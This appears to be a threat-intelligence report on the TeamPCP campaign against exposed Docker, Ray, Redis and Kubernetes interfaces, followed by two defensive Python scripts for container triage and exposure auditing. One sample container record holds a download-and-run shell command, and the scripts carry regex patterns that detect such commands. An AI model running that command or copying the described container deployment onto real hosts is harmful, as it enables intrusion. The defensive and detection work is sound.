TeamPCP’s Massive Exploitation of Cloud Misconfigurations: A Self-Propagating Cybercrime Network
In December 2025, a cybercriminal group known as TeamPCP (also tracked as PCPcat, ShellForce, and DeadCatx3) launched a large-scale campaign against cloud infrastructure. The group targeted exposed Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers, alongside React2Shell vulnerabilities, to build a distributed proxy and scanning network. Compromised servers were then used for data exfiltration, ransomware deployment, extortion, and cryptocurrency mining.
The campaign's intensity peaked around Christmas Day 2025, after which activity declined noticeably. TeamPCP members nevertheless continued to share stolen data publicly across several Telegram channels, indicating that the operation was still ongoing.
Operational Scale and Integration
What distinguishes TeamPCP is not the novelty of its exploits but the scale and integration of its operations. The group has turned well-known misconfigurations into a cloud-native exploitation platform, converting exposed infrastructure into a self-sustaining criminal ecosystem. Its strength lies in extensive automation: each compromised server is repurposed for several malicious roles at once, including cryptomining, proxy networking, command-and-control relays, scanning, and data hosting.
Technical Insights and Infrastructure
Flare researchers identified 185 compromised servers running attacker-deployed containers executing standardized command patterns, providing clear visibility into TeamPCP’s methods. The primary command-and-control node, located at 67.217.57.240, was found on 182 compromised hosts. Additionally, a secondary infrastructure at 44.252.85.168 was observed on three other victim servers, suggesting operational redundancy or early-stage infrastructure migration.
The majority of leaked data originates from Western countries, with targeted organizations spanning the e-commerce, finance, and human resources sectors. Cloud infrastructures are predominantly affected, with Azure accounting for 61% and AWS for 36% of compromised servers, collectively representing 97% of the affected infrastructure.
Attack Mechanism and Worm-Like Propagation
TeamPCP's operations begin with automated scanning across large IP ranges to identify exposed Docker APIs and Ray dashboards. Once an unauthenticated management endpoint is confirmed, the group remotely deploys malicious containers or jobs through it; no exploit is required beyond the missing authentication.
In Docker environments, the attackers pull a stock Alpine image and launch a container with host networking and an auto-restart policy that fetches and executes remote scripts. Host networking gives the container direct access to the host's interfaces and loopback services, and the restart policy makes the foothold survive container exits and daemon restarts. In Ray environments, they submit jobs that execute base64-encoded bootstrap payloads.
The 'proxy.sh' script serves as the campaign's operational backbone. It installs proxy utilities, peer-to-peer tools, tunneling capabilities, and additional scanners that continuously search the internet for further vulnerable servers. For long-term persistence, the script registers multiple system services, turning each infected host into a self-maintaining scanning and relay node.
When the script detects a Kubernetes environment, it branches into a separate execution path and deploys cluster-specific secondary payloads. This indicates that TeamPCP maintains distinct tooling for cloud-native targets rather than relying on generic Linux malware.
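The container deployment pattern described above (stock Alpine image, host networking, auto-restart, a command that downloads and runs a remote script) is something defenders can triage directly from the Docker API. The following is an added example, not TeamPCP tooling and not Flare's code: it scores `docker inspect`-style records (the same JSON that `GET /containers/<id>/json` returns) against those traits. The sample records, the documentation IP address in the command, and the threshold of three indicators are this example's own choices; the `privileged` and host-root-mount checks are standard things to look for and are not behaviours the article attributes to this campaign.

```python
"""Triage Docker containers for an attacker-style deployment pattern.

Added example, not from the page. Input is the JSON that `docker inspect`
(or GET /containers/<id>/json) returns; output is the set of indicators each
container matches. All sample records below are constructed.
"""
import re

# A downloader piped into a shell, or an inline base64 decode executed by a shell.
FETCH_AND_RUN = re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b")
BASE64_EXEC = re.compile(r"base64\s+(-d|--decode).*\|\s*(ba)?sh\b")
REMOTE_URL = re.compile(r"https?://")


def container_indicators(inspect: dict) -> list:
    """Return the indicator names matched by one inspect record."""
    host = inspect.get("HostConfig", {})
    cfg = inspect.get("Config", {})
    cmdline = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    hits = []
    if host.get("NetworkMode") == "host":
        hits.append("host_network")
    if host.get("RestartPolicy", {}).get("Name") in ("always", "unless-stopped"):
        hits.append("auto_restart")
    # Not described on the page; included because they are common escalations.
    if host.get("Privileged"):
        hits.append("privileged")
    if any(b.startswith("/:") for b in host.get("Binds") or []):
        hits.append("host_root_mount")
    image = cfg.get("Image", "")
    if image.split(":")[0] in ("alpine", "docker.io/library/alpine"):
        hits.append("stock_alpine")
    if FETCH_AND_RUN.search(cmdline) or BASE64_EXEC.search(cmdline):
        hits.append("fetch_and_exec")
    if REMOTE_URL.search(cmdline):
        hits.append("remote_url_in_cmd")
    return hits


def triage(records: list, threshold: int = 3) -> list:
    """Return (container name, indicators) for records at or above threshold.

    The threshold avoids flagging legitimate host-networked, always-restart
    agents (exporters, log shippers) that match two traits by design.
    """
    out = []
    for rec in records:
        hits = container_indicators(rec)
        if len(hits) >= threshold:
            out.append((rec.get("Name", "?").lstrip("/"), hits))
    return out


# Constructed sample records; 198.51.100.7 is a documentation address, not an IoC.
SAMPLE_CONTAINERS = [
    {
        "Name": "/jolly_wu",
        "Config": {"Image": "alpine", "Entrypoint": None,
                   "Cmd": ["sh", "-c", "wget -qO- http://198.51.100.7/proxy.sh | sh"]},
        "HostConfig": {"NetworkMode": "host", "RestartPolicy": {"Name": "always"},
                       "Privileged": False, "Binds": None},
    },
    {
        "Name": "/node-exporter",
        "Config": {"Image": "prom/node-exporter:v1.7.0", "Entrypoint": ["/bin/node_exporter"],
                   "Cmd": []},
        "HostConfig": {"NetworkMode": "host", "RestartPolicy": {"Name": "always"},
                       "Privileged": False, "Binds": ["/proc:/host/proc:ro"]},
    },
    {
        "Name": "/web",
        "Config": {"Image": "nginx:1.25", "Entrypoint": None, "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"NetworkMode": "bridge", "RestartPolicy": {"Name": "no"},
                       "Privileged": False, "Binds": None},
    },
]

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_CONTAINERS):
        print(f"{name}: {', '.join(hits)}")
```

Run against live hosts by feeding it the output of `docker inspect $(docker ps -q)`; the exporter record shows why two traits alone are not enough, since legitimate monitoring agents also run host-networked with `always` restart.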
Implications and Recommendations
The emergence of TeamPCP underscores that unauthenticated management interfaces, not zero-days, are what let a campaign of this size run. Organizations should prioritize the following measures:
1. Regular Security Audits: Enumerate every internet-reachable management interface across all cloud accounts (Docker daemon TCP sockets, Kubernetes API servers and kubelets, Ray dashboards, Redis), not only the ones the security team already knows about. The campaign's victims were found by mass scanning, so anything reachable will be found.
2. Access Controls: Never expose the Docker API over TCP without TLS client-certificate verification; keep Ray dashboards bound to localhost or behind an authenticated proxy; require authentication on Redis; and restrict Kubernetes API and kubelet access with network controls and RBAC.
3. Patch Management: Apply patches promptly for exploited vulnerabilities such as React2Shell, which the campaign used alongside misconfigurations.
4. Monitoring and Detection: Alert on container creation through the remote API, especially host-networked or auto-restarting containers launched from stock images whose command fetches a remote script; on newly registered system services; on unexpected Ray job submissions; and on outbound connections to the command-and-control addresses identified in this campaign (67.217.57.240 and 44.252.85.168).
5. Incident Response Planning: Maintain and exercise a playbook for compromised cloud hosts that covers isolation, preservation of container and service artifacts, and rotation of any credentials reachable from the host, since a host-networked container can reach the same metadata and internal services the host can.
By adopting these measures, organizations can reduce their exposure to threats like TeamPCP, whose success depends on finding interfaces that should never have been reachable in the first place.
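The audit and access-control recommendations above reduce to two concrete checks on each host: is the Docker daemon listening on TCP without client-certificate verification, and which of the services named in this article are bound to a wildcard address. The following is an added example, not part of the original page or any vendor tooling. It reads a Docker `daemon.json` (the `hosts`, `tls` and `tlsverify` keys are real Docker daemon options) and a socket table in `ss -Hltn` format; the port-to-service map, the sample configurations and the sample socket lines are this example's own constructions.

```python
"""Audit a host for management interfaces reachable from any address.

Added example, not from the page. Check 1 inspects Docker's daemon.json for a
TCP listener that lacks TLS client verification. Check 2 parses `ss -Hltn`
output and reports the article's services when bound to a wildcard address.
All sample inputs are constructed.
"""
import json

# Default ports of the services the article names; this map is the example's own.
MANAGEMENT_PORTS = {
    2375: "Docker API (plaintext)",
    2376: "Docker API (TLS)",
    6379: "Redis / Ray GCS",
    8265: "Ray dashboard",
    6443: "Kubernetes API server",
    10250: "kubelet",
}
WILDCARD = {"0.0.0.0", "*", "::", "[::]"}


def audit_daemon_json(text: str) -> list:
    """Return findings for TCP listeners in a Docker daemon.json document."""
    cfg = json.loads(text)
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local
        if not (cfg.get("tls") and cfg.get("tlsverify")):
            findings.append(f"{host}: TCP listener without tlsverify")
        elif host.startswith("tcp://0.0.0.0"):
            findings.append(f"{host}: TLS listener on all interfaces; prefer a private address")
    return findings


def exposed_services(ss_output: str) -> list:
    """Return (port, service) for known management ports bound to a wildcard."""
    out = []
    for line in ss_output.strip().splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")  # handles "[::]:22" too
        port = int(port)
        if addr in WILDCARD and port in MANAGEMENT_PORTS:
            out.append((port, MANAGEMENT_PORTS[port]))
    return out


# Constructed: the weak setting beside the corrected one.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["tcp://0.0.0.0:2375", "unix:///var/run/docker.sock"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["tcp://10.0.0.5:2376", "unix:///var/run/docker.sock"],
    "tls": True,
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed `ss -Hltn` output: one exposed Docker API, one exposed Redis,
# a Ray dashboard correctly bound to loopback, and SSH.
SAMPLE_SS = """\
LISTEN 0 4096 0.0.0.0:2375 0.0.0.0:*
LISTEN 0 128 127.0.0.1:8265 0.0.0.0:*
LISTEN 0 511 *:6379 *:*
LISTEN 0 4096 [::]:22 [::]:*
"""

if __name__ == "__main__":
    for f in audit_daemon_json(WEAK_DAEMON_JSON):
        print("daemon.json:", f)
    for port, svc in exposed_services(SAMPLE_SS):
        print(f"exposed: {svc} on port {port}")
```

On a real host, replace `SAMPLE_SS` with the output of `ss -Hltn` and read `/etc/docker/daemon.json`; note that `dockerd` can also receive `-H tcp://...` on its command line (for example from a systemd unit), which this check of the file alone will not see.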